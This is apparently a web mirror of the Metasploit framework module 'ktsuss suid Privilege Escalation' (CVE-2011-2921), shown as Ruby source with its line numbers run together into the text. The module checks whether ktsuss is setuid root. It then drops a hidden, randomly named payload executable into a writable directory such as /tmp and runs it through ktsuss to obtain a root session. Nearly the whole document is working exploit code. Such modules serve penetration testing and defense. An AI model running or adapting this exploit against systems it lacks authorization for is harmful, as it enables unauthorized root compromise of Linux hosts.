CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/linux/local/ktsuss_suid_priv_esc.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Local6Rank = ExcellentRanking78include Msf::Post::File9include Msf::Post::Linux::Priv10include Msf::Post::Linux::System11include Msf::Exploit::EXE12include Msf::Exploit::FileDropper13prepend Msf::Exploit::Remote::AutoCheck1415def initialize(info = {})16super(17update_info(18info,19'Name' => 'ktsuss suid Privilege Escalation',20'Description' => %q{21This module attempts to gain root privileges by exploiting22a vulnerability in ktsuss versions 1.4 and prior.2324The ktsuss executable is setuid root and does not drop25privileges prior to executing user specified commands,26resulting in command execution with root privileges.2728This module has been tested successfully on:2930ktsuss 1.3 on SparkyLinux 6 (2019.08) (LXQT) (x64); and31ktsuss 1.3 on SparkyLinux 5.8 (LXQT) (x64).32},33'License' => MSF_LICENSE,34'Author' => [35'John Lightsey', # Discovery and exploit36'bcoles' # Metasploit37],38'DisclosureDate' => '2011-08-13',39'References' => [40['CVE', '2011-2921'],41['URL', 'https://www.openwall.com/lists/oss-security/2011/08/13/2'],42['URL', 'https://security.gentoo.org/glsa/201201-15'],43['URL', 'https://github.com/bcoles/local-exploits/blob/master/CVE-2011-2921/ktsuss-lpe.sh']44],45'Platform' => ['linux'],46'Arch' => [47ARCH_X86,48ARCH_X64,49ARCH_ARMLE,50ARCH_AARCH64,51ARCH_PPC,52ARCH_MIPSLE,53ARCH_MIPSBE54],55'SessionTypes' => ['shell', 'meterpreter'],56'Targets' => [['Auto', {}]],57'DefaultOptions' => {58'AppendExit' => true,59'PrependSetresuid' => true,60'PrependSetresgid' => true,61'PrependSetreuid' => true,62'PrependSetuid' => true,63'PrependFork' => true64},65'Notes' => {66'Reliability' => [ REPEATABLE_SESSION ],67'Stability' => [ CRASH_SAFE ]68},69'DefaultTarget' => 070)71)72register_options [73OptString.new('KTSUSS_PATH', [true, 'Path to staprun executable', '/usr/bin/ktsuss'])74]75register_advanced_options [76OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])77]78end7980def ktsuss_path81datastore['KTSUSS_PATH']82end8384def base_dir85datastore['WritableDir'].to_s86end8788def upload(path, data)89print_status "Writing '#{path}' (#{data.size} bytes) ..."90rm_f path91write_file path, data92register_file_for_cleanup path93end9495def upload_and_chmodx(path, data)96upload path, data97chmod path98end99100def check101return CheckCode::Safe("#{ktsuss_path} file not found") unless file? ktsuss_path102return CheckCode::Safe("#{ktsuss_path} is not setuid") unless setuid? ktsuss_path103104vprint_good "#{ktsuss_path} is setuid"105106id = cmd_exec 'whoami'107res = cmd_exec("#{ktsuss_path} -u #{id} id").to_s108vprint_status res109110unless res.include? 'uid=0'111return CheckCode::Safe112end113114CheckCode::Vulnerable115end116117def exploit118if !datastore['ForceExploit'] && is_root?119fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')120end121122unless writable? base_dir123fail_with Failure::BadConfig, "#{base_dir} is not writable"124end125126payload_name = ".#{rand_text_alphanumeric 10..15}"127payload_path = "#{base_dir}/#{payload_name}"128upload_and_chmodx payload_path, generate_payload_exe129130print_status 'Executing payload ...'131id = cmd_exec 'whoami'132res = cmd_exec "#{ktsuss_path} -u #{id} #{payload_path} & echo "133vprint_line res134end135end136137138